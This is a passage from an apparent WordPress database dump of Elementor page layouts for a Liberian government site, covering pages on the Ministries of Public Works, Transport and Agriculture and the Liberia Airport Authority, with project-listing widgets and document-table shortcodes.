sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3d3914\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"70602b6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"237f6997\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"321f3817\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"cari\\\",\\\"tag_id\\\":\\\"49\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"cari\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"32aca63d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2da625e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76368934\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f4d863d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:cari\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8941,1592,'_dp_original','1590'),(8942,1592,'_edit_last','42'),(8944,1594,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8945,1594,'slide_template','default'),(8947,1594,'_elementor_template_type','wp-post'),(8948,1594,'_elementor_version','2.7.5'),(8949,1594,'_wp_page_template','default'),(8950,1594,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d2cc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a8d61b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5373839\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe27600\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mpw\\\",\\\"tag_id\\\":\\\"63\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mpw\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dae3b98\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8952,1594,'_dp_original','1592'),(8953,1594,'_edit_last','38'),(8954,1596,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8955,1596,'slide_template','default'),(8957,1596,'_elementor_template_type','wp-post'),(8958,1596,'_elementor_version','2.7.5'),(8959,1596,'_wp_page_template','default'),(8960,1596,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia Airport Authority Information coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cfc190\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"ef8085e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"197521f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1214e7c\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"laa\\\",\\\"tag_id\\\":\\\"55\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"laa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2241ab5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e6ea64b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4015db0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3742cd2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:laa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8961,1596,'_dp_original','1594'),(8962,1596,'_edit_last','42'),(8964,1598,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8965,1598,'slide_template','default'),(8967,1598,'_elementor_template_type','wp-post'),(8968,1598,'_elementor_version','2.7.5'),(8969,1598,'_wp_page_template','default'),(8970,1598,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d39894\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.<\\/p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"52624ff6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6d47854\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3c330365\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"30a16cc2\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mot\\\",\\\"tag_id\\\":\\\"62\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mot\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3aa21\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"69e27fd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df2b844\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9e5ee94\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mot\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8971,1598,'_dp_original','1596'),(8972,1598,'_edit_last','42'),(8974,1600,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8975,1600,'slide_template','default'),(8977,1600,'_elementor_template_type','wp-post'),(8978,1600,'_elementor_version','2.7.5'),(8979,1600,'_wp_page_template','default'),(8980,1600,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p><p><span style=\\\"font-size: 14px;\\\">In addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.<\\/span><\\/p><p>The core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.<\\/p><h4>Mandate<\\/h4><p>The Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b499042\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e7777d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"95e395c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ecf4b97\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read 